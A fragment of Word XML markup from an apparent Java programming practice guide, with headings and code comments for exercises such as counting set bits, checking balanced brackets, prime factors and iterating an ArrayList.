    </w:p>
    <w:p w14:paraId="1B89E8E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4B9878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C90AE5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E16B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9C6F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92C7D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of numbers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A08B82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7</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B8E7DF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839B5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arget sum</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37EA2E7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p>
    <w:p w14:paraId="2E0491D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05C01C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to store current subset</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64BD283A"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7BD195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82899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helper function to find subsets with the given sum</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E4E49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4621FE9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A95340" w14:textId="2695099A"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C8333EF" w14:textId="77777777" w:rsidR="00436415" w:rsidRPr="00CE4B95" w:rsidRDefault="00436415" w:rsidP="00436415">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="511A227F" w14:textId="455F3C33" w:rsidR="00981239" w:rsidRPr="00CE4B95" w:rsidRDefault="00981239">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="343" w:name="_Toc197867557"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Program</w:t>
      </w:r>
      <w:r w:rsidR="005F61EB" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidR="00486E4D" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Count</w:t>
      </w:r>
      <w:r w:rsidR="005F61EB" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> set bits in an integer Ex: 13 -&gt; 1101 Print number of 1’s in the given binary number</w:t>
      </w:r>
      <w:r w:rsidR="003073F6" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="343"/>
    </w:p>
    <w:p w14:paraId="1ABC8DB3" w14:textId="7B563BAA" w:rsidR="001B04CB" w:rsidRPr="00CE4B95" w:rsidRDefault="001B04CB" w:rsidP="001B04CB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Approach – 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211F4B8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A215B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D28283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ount set bits in the integer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589B5677"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50EB9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D6A1FCC"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B52B43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oop until n becomes 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED7A8F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7A24E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rement count if the least significant bit is 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E5D66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6601C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02382CA"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ight shift n by 1 to check the next bit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5D5BB1"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1938D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9561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988B84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6D124DC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93996F" w14:textId="44120BA2"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71EF9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F0183D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82CB9D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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E20695"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182352A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E279AC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706A902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4328EE4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9D134" w14:textId="0EEC9146"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D835A2" w14:textId="77777777" w:rsidR="00D612F3" w:rsidRPr="00CE4B95" w:rsidRDefault="00D612F3" w:rsidP="005B1A3B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7243FAE3" w14:textId="22B8A0FE" w:rsidR="005B1A3B" w:rsidRPr="00CE4B95" w:rsidRDefault="005B1A3B" w:rsidP="005B1A3B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Approach – 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CD3B98"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73EF1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81A06"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CFB3BC2"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D306AC0"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 using built-in method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257C2975"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i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274F41F3"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6A1D5F4"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999C0D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0A87D1B9"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32D035" w14:textId="092D6EF8"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68296D" w14:textId="77777777" w:rsidR="000633B0" w:rsidRPr="00CE4B95" w:rsidRDefault="000633B0" w:rsidP="000633B0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C153BD5" w14:textId="72A255C4" w:rsidR="00981239" w:rsidRPr="00CE4B95" w:rsidRDefault="00981239">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="344" w:name="_Toc197867558"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Program</w:t>
      </w:r>
      <w:r w:rsidR="00874717" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Check bracket balanced</w:t>
      </w:r>
      <w:r w:rsidR="00C96AE1" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> or not</w:t>
      </w:r>
      <w:bookmarkEnd w:id="344"/>
    </w:p>
    <w:p w14:paraId="430FD339" w14:textId="77777777" w:rsidR="00BC0CC6" w:rsidRPr="00CE4B95" w:rsidRDefault="00981239" w:rsidP="00BC0CC6">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Problem Definition: </w:t>
      </w:r>
      <w:r w:rsidR="00BC0CC6" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Write a program to balancing of the brackets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A50B27" w14:textId="742D3FF4" w:rsidR="00981239" w:rsidRPr="00CE4B95" w:rsidRDefault="00547D7C" w:rsidP="00036601">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Example:</w:t>
      </w:r>
      <w:r w:rsidR="00BC0CC6" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> Input - {[(a+b)+c]+x+y]}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A9E0E3" w14:textId="48380EBC"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3468815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36915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lancedBracke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1986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0F1A32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the brackets are balanced</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="410CFE4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841EA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ck to store opening brackets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2999726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a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gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC6523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D44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expression</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="443B5D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79752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29128A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5D03D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n opening bracket, push it onto the stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D2F90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A8C34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p>
    <w:p w14:paraId="5D597CE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95D2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 closing bracket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61181DC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348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tack is empty (no matching opening bracket)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54FD05F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AAB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4E3AEA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B0608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p the top element from the stack and check for matching pair</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02744B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p</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4272DEE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DEC4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C24446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F33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F6FF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7B25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761C2B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tack is empty, the brackets are balanced</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C77E42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0E77DDA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CEFF"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7CE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0B720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ess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x+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3222263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3203A1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brackets are balanced</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6661236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pr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96FB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balanced."</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3635B7F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DF336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not balanced."</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC3EAD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15B7B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68A94" w14:textId="126A9085"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7772FF18" w14:textId="77777777" w:rsidR="00184653" w:rsidRPr="00CE4B95" w:rsidRDefault="00184653" w:rsidP="00184653">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="607BB376" w14:textId="57FB84A4" w:rsidR="00981239" w:rsidRPr="00CE4B95" w:rsidRDefault="00981239">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="345" w:name="_Toc197867559"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Program</w:t>
      </w:r>
      <w:r w:rsidR="00C37F6D" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Print prime factors for given numbers</w:t>
      </w:r>
      <w:bookmarkEnd w:id="345"/>
    </w:p>
    <w:p w14:paraId="23F727E7" w14:textId="30FA7CED"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Facto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45AB45"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C87E1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prime factors of a number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0298F95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A33E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handle the smallest prime factor 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA371E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56859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45509CD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09CF4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85A79"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93AC0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check for odd numbers starting from 3 to sqrt(n)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143A3FE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B1B0A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37BB8"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C3E15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4C7651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EBD77"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2CF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C5A69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 is still greater than 2, then it must be prime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D94316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1B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7228A45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BA8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9EF48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16F7C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2CF53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2AC75FD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DB3E16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factors of the number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38DB8F74"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factor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re: "</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A1B16D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C488E7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D5D37" w14:textId="179D67B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1C938B" w14:textId="77777777" w:rsidR="009F7A7E" w:rsidRPr="00CE4B95" w:rsidRDefault="009F7A7E" w:rsidP="009F7A7E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DB6118B" w14:textId="0A0E8695" w:rsidR="00981239" w:rsidRPr="00CE4B95" w:rsidRDefault="00981239">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="346" w:name="_Toc197867560"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Program</w:t>
      </w:r>
      <w:r w:rsidR="00B63643" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidR="009412A7" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="00B63643" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">rint prime numbers </w:t>
      </w:r>
      <w:r w:rsidR="00464D04" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>in range</w:t>
      </w:r>
      <w:r w:rsidR="00B63643" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>? Ex: 24 to 100</w:t>
      </w:r>
      <w:bookmarkEnd w:id="346"/>
    </w:p>
    <w:p w14:paraId="24CC96DB" w14:textId="329F65C2"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NumbersInRan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1A76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3F9DB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a number is prime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39924F0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ri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EE4EF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edge cases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D58B6B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65976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76DB12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2905E"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CD94681"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divisibility from 2 to the square root of num</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4672B35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56900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F65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t prime if divisible by any number other than 1 and itself</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D39885A"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30BB1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6256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55447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e if no divisors were found</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3092F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2489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26F02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880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// Method to print all prime numbers in a given range</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D76C8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B03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65E5E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310EB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90DF60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A4D7F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FEF68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3746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D650F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CE5A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of the range</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1232196C"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nd of the range</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27060619"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24B9F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numbers in the given range</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74FED3C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numbers betw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n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6F0F691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D3F4B2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D168B" w14:textId="1E683F3B"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76FD2EE" w14:textId="77777777" w:rsidR="00491E6E" w:rsidRPr="00CE4B95" w:rsidRDefault="00491E6E" w:rsidP="00491E6E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62ACD3BF" w14:textId="16ED1D4E" w:rsidR="00981239" w:rsidRPr="00CE4B95" w:rsidRDefault="00981239">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="347" w:name="_Toc197867561"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Program</w:t>
      </w:r>
      <w:r w:rsidR="004C2FAA" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidR="00613E49" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidR="004C2FAA" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>terate ArrayList in different ways</w:t>
      </w:r>
      <w:bookmarkEnd w:id="347"/>
    </w:p>
    <w:p w14:paraId="20FF5273" w14:textId="79A77F7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56D88A6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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C43B29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5C283F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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1DAA0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FA9C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Ite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F100B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935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E29239"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ArrayList and add some elements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56108D4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4084D9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D952BD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EBFA15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589E207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te"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45511BA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9D962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Using a classic for loop (index-based)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F96258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ing classic for loop:"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2A208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2DCFC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587DF4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C86A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1747F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Using enhanced for loop (for-each loop)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423042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enhanced for loop:"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50802A5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ru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4F9F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ruit</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E57231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EA34C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8514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Using Iterator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F53AC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Iterator:"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38122BB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2C2346F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77DB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D4F214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BCC9C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94E20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4. Using ListIterator (Bidirectional iteration)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B01C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forward):"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294170C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p>
    <w:p w14:paraId="4E9050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9498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50788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CFC49A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A22BD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ListIterator (Backward iteration)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2977A1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backward):"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7ABA2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Previo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438B0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evious</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7238B1D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BE82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D56EF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 Using Java 8 Streams</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320DE06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Streams:"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59679D5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70D354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04CE93" w14:textId="61468E49"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A40BB8" w14:textId="77777777" w:rsidR="004C2FAA" w:rsidRPr="00CE4B95" w:rsidRDefault="004C2FAA" w:rsidP="004C2FAA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
